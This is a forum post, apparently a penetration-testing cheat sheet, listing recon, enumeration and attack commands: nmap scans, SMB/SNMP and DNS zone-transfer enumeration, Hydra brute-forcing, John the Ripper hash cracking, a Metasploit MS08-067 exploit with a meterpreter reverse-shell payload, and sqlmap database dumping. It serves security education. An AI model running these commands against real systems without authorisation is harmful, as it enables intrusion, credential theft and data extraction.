Essential Recon & Enumeration Commands

x32x01
  • by x32x01 ||

Recon and Enumeration for Ethical Hacking 🕵️‍♂️

Reconnaissance (Recon) and Enumeration are the first steps in ethical hacking. They help identify open ports, services, and possible vulnerabilities before launching any exploit. Let’s break down the most powerful tools and commands every hacker should know 👇

Nmap - Network Discovery Tool 🌐

Nmap is the most popular tool for scanning networks. It can detect hosts, services, OS versions, and firewalls.

Common Commands:
  • nmap -v -sS -A -T4 target → Full scan with OS and service detection
  • nmap -p- target → Scan all TCP ports
  • nmap localhost → Show active local ports
You can also search Nmap scripts with:
ls /usr/share/nmap/scripts/* | grep ftp


SMB & SNMP Enumeration 🧠

SMB (Server Message Block) is used for sharing files and printers on Windows systems.

Commands:
  • nbtscan 192.168.1.0/24 → Find Windows/Samba servers
  • enum4linux -a target-ip → Enumerate Windows shares and users

SNMP Enumeration:
  • snmpwalk -c public -v1 192.168.1.X → Extract system info
  • onesixtyone -c names -i hosts → Scan for SNMP servers


DNS & Web Enumeration 🌍

DNS and web enumeration help discover hidden subdomains and services.

Commands:
  • dnsrecon -d example.com -t std → Scan for DNS records
  • dig axfr example.com @ns1.example.com → Attempt zone transfer
  • nikto -h target → Scan websites for vulnerabilities
  • dirbuster → Brute-force hidden directories


Brute Force & Password Cracking 🔐

Hydra is used to brute-force logins for FTP, POP3, or SMTP.

Examples:
  • hydra -l user -P /usr/share/wordlists/rockyou.txt target ftp
  • hydra -P passwords.txt target smtp

John the Ripper cracks password hashes:
  • john --wordlist=rockyou.txt hashes


Exploit Development 💣

Once vulnerabilities are found, exploit them safely in a lab.

Compiling exploits:
  • gcc -o exploit exploit.c → Compile for Linux
  • i586-mingw32msvc-gcc exploit.c -o exploit.exe → Compile for Windows

Metasploit:
  • use exploit/windows/smb/ms08_067_netapi → Famous SMB exploit
  • set payload windows/meterpreter/reverse_tcp → Reverse shell payload


Networking & IP Basics 📡

Quick networking essentials every hacker should know:
OSTTL Value
Windows128
Linux64
Cisco255

Private IP Ranges:
  • 10.0.0.0 - 10.255.255.255
  • 172.16.0.0 - 172.31.255.255
  • 192.168.0.0 - 192.168.255.255


SQLMap - SQL Injection Automation 💾

SQLMap automates database exploitation.

Examples:
  • sqlmap -u "http://target.com?id=1" --dbs → Detect and list databases
  • sqlmap -u target --forms --crawl=10 → Scan forms automatically


Final Thoughts 💡

Recon and Enumeration are the foundation of penetration testing. Tools like Nmap, Hydra, DNSRecon, and SQLMap can help you uncover critical information - but remember, always use them ethically and legally ⚖️
 
Last edited:
Related Threads
x32x01
Memory Forensics Guide: RAM Analysis Tips Now
  • x32x01
Replies
0
Views
126
x32x01
x32x01
x32x01
Memory Flip Attacks: Risks & Defense Guide
  • x32x01
Replies
0
Views
165
x32x01
x32x01
x32x01
Disk Group Privilege Escalation
  • x32x01
Replies
0
Views
996
x32x01
x32x01
Register & Login Faster
Forgot your password?
Latest Posts
Latest Resources
Forum Statistics
Threads
629
Messages
633
Members
65
Latest Member
Mikrax
Back
Top